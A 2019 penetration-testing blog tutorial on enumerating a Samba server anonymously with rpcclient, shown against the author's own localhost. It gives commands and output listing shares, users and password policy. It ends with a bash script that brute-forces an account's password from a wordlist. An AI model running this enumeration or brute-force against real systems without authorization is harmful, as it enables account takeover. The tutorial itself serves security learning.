Sunday, October 6, 2019

Enumerating Samba Servers with rpcclient

Connecting to the remote service

We can connect to the remote samba service anonymously using the -N option which specifies no password. once you connect to the remote service it should drop you to a prompt much like the smb utility. One rpcclient allows you to do is run commands on a single command line instead of working in the console. This is the way we will enumerate the remote service

root@asus:~% rpcclient -U "" -N 127.0.0.1
rpcclient $>

Query Server Information

root@asus:~% rpcclient -U "" -N -c "srvinfo" 127.0.0.1
 ASUS           Wk Sv PrQ Unx NT SNT asus server (Samba, Ubuntu)
 platform_id     : 500
 os version      : 6.1
 server type     : 0x809a03
root@asus:~%

Enumerate all shares

root@asus:~% rpcclient -U "" -N -c "netshareenumall" 127.0.0.1
netname: homes
 remark: Home Directories
 path: C:
 password: 
netname: print$
 remark: Printer Drivers
 path: C:\var\lib\samba\printers
 password: 
netname: share
 remark: 
 path: C:\home\sam\public_html\pub
 password: 
netname: IPC$
 remark: IPC Service (asus server (Samba, Ubuntu))
 path: C:\tmp
 password: 
root@asus:~%

Get Share Information

root@asus:~% rpcclient -U "" -N -c "netsharegetinfo share 2" 127.0.0.1
netname: share
 remark: 
 path: C:\home\sam\public_html\pub
 password: 
root@asus:~%

Display Account Information

root@asus:~% rpcclient -U "" -N -c "querydispinfo" 127.0.0.1
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: sam Name: sam Desc: 
index: 0x2 RID: 0x3ea acb: 0x00000010 Account: hayden Name: hayden sutton Desc: 
index: 0x3 RID: 0x3ec acb: 0x00000010 Account: sasha Name: sasha kim Desc: 
index: 0x4 RID: 0x3e9 acb: 0x00000010 Account: clare Name: clare chapman Desc: 
index: 0x5 RID: 0x3eb acb: 0x00000010 Account: jared Name: jared beck Desc: 
index: 0x6 RID: 0x3ed acb: 0x00000010 Account: vance Name: vance perkins Desc: 
root@asus:~%

Enumerate Domain Users

root@asus:~% rpcclient -U "" -N -c "enumdomusers" 127.0.0.1
user:[sam] rid:[0x3e8]
user:[hayden] rid:[0x3ea]
user:[sasha] rid:[0x3ec]
user:[clare] rid:[0x3e9]
user:[jared] rid:[0x3eb]
user:[vance] rid:[0x3ed]
root@asus:~%

Get User Information

root@asus:~% rpcclient -U "" -N -c "queryuser 0x3ea" 127.0.0.1
 User Name   : hayden
 Full Name   : hayden sutton
 Home Drive  : \\asus\hayden
 Dir Drive   : 
 Profile Path: \\asus\hayden\profile
 Logon Script: 
 Description : 
 Workstations: 
 Comment     : 
 Remote Dial :
 Logon Time               : Wed, 31 Dec 1969 17:00:00 MST
 Logoff Time              : Wed, 06 Feb 2036 08:06:39 MST
 Kickoff Time             : Wed, 06 Feb 2036 08:06:39 MST
 Password last set Time   : Mon, 02 Sep 2019 12:29:46 MDT
 Password can change Time : Mon, 02 Sep 2019 12:29:46 MDT
 Password must change Time: Wed, 13 Sep 30828 20:48:05 MDT
 unknown_2[0..31]...
 user_rid : 0x3ea
 group_rid: 0x201
 acb_info : 0x00000010
 fields_present: 0x00ffffff
 logon_divs: 168
 bad_password_count: 0x00000000
 logon_count: 0x00000000
 padding1[0..7]...
 logon_hrs[0..21]...
root@asus:~%

Get Domain Information

root@asus:~% rpcclient -U "" -N -c "querydominfo" 127.0.0.1
Domain:  WORKGROUP
Server:  ASUS
Comment: asus server (Samba, Ubuntu)
Total Users: 6
Total Groups: 0
Total Aliases: 0
Sequence No: 1570400386
Force Logoff: -1
Domain Server State: 0x1
Server Role: ROLE_DOMAIN_PDC
Unknown 3: 0x1
root@asus:~%

Enumerate Domains

root@asus:~% rpcclient -U "" -N -c "enumdomains" 127.0.0.1
name:[ASUS] idx:[0x0]
name:[Builtin] idx:[0x1]
root@asus:~%

Get Password Policy Information

root@asus:~% rpcclient -U "" -N -c "getusrdompwinfo 0x3eb" 127.0.0.1
min_password_length: 5
    &info.password_properties: 0xe3266264 (3810943588)
           0: DOMAIN_PASSWORD_COMPLEX  
           0: DOMAIN_PASSWORD_NO_ANON_CHANGE
           1: DOMAIN_PASSWORD_NO_CLEAR_CHANGE
           0: DOMAIN_PASSWORD_LOCKOUT_ADMINS
           0: DOMAIN_PASSWORD_STORE_CLEARTEXT
           1: DOMAIN_REFUSE_PASSWORD_CHANGE

root@asus:~%

These are just some of the command available to you when using the rpcclient. It would be advised to enter in to the rpcclient console and type 'help' for a list of full commands you have at your disposal.

Brute Force with rpcclient

Here is a way to brute force samba passwords using the rpcclient utility and bash.

#!/usr/bin/env bash
##
## Dictonary password attack against a valid samba username using rpcclient
##

user="sasha"
host="127.0.0.1"
list="users.txt"

file=$(<${list})
wordlist=(`echo $file | sed 's/ /\n/g'`)

echo "[*] Searching for the password for [${user}]..."

for word in "${wordlist[@]}"
do
    rpcclient -U "${user}%${word}" -c "quit" ${host} 1>/dev/null

    if [ $? == 0 ]
    then
        echo "[+] Password \`${word}\` found for [${user}]"
    fi
done

If we run the script...

root@asus:~% ./rpcclient.sh 
[*] Searching for the password for [sasha]...
[+] Password `master` found for [sasha]
root@asus:~%
at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...

  • Enumerating SNMP Servers with NMAP
    NMAP gives you the ability to use scripts to enumerate and exploit remote host with the use of the NMAP Scripting Engine. Today we will be ...
  • Enumerating SMTP Servers with NMAP
    NMAP gives you the ability to enumerate SMTP service with some scripts from the NMAP Scripting Enigne. These scripts will produce some gene...
  • Testing LDAP servers with examples
    Today we are going to be attacking the remote service LDAP. The only thing we need is an IP Address so lets ping our host to verify its up ...
  • Exploring POP3 Servers
    Scanning the remote host We can use NMAP to scan the remote host and run enumeration scripts against the POP3 server. root@asus:~/unix% ...
  • Reading local files with XXE attacks
    Today we will be exploring XXE XML External Entity Attacks. A XXE attack is a attack that is brought against an application that deals with...
  • bWAPP Remote & Local File Inclusion (RFI/LFI)
    In bWAPP There is a module for RFI and LFI injections. Our goal is to exploit these vulnerabilities and get local access to the remote mac...
  • Socat Encrypted Bind and Reverse shells
    Encrypted Bind Shell First we need to generate a new openssl key to use with our bind shell. Victim Box: user@debian:~$ openssl req -ne...
  • DVWA: SQL Injection (Blind) with sqlmap
    We start off by getting the database names hosted on the remote server. sam@ubuntu:~/pentest/sqlmap$ python sqlmap.py -u "http://192...
  • Exploring NTP servers
    The ntpupdate command is used for updating your system time from a remote NTP server root@asus:~/unix% ntpdate -d 48.21.33.124 24 Sep 11:...
  • Metasploitable II: Samba Shares
    Lets first start off with an nmap scan of the remote host. root@ubuntu:~# nmap -p 139,445 -sV -sC 192.168.56.101 Starting Nmap 7.60 ( ht...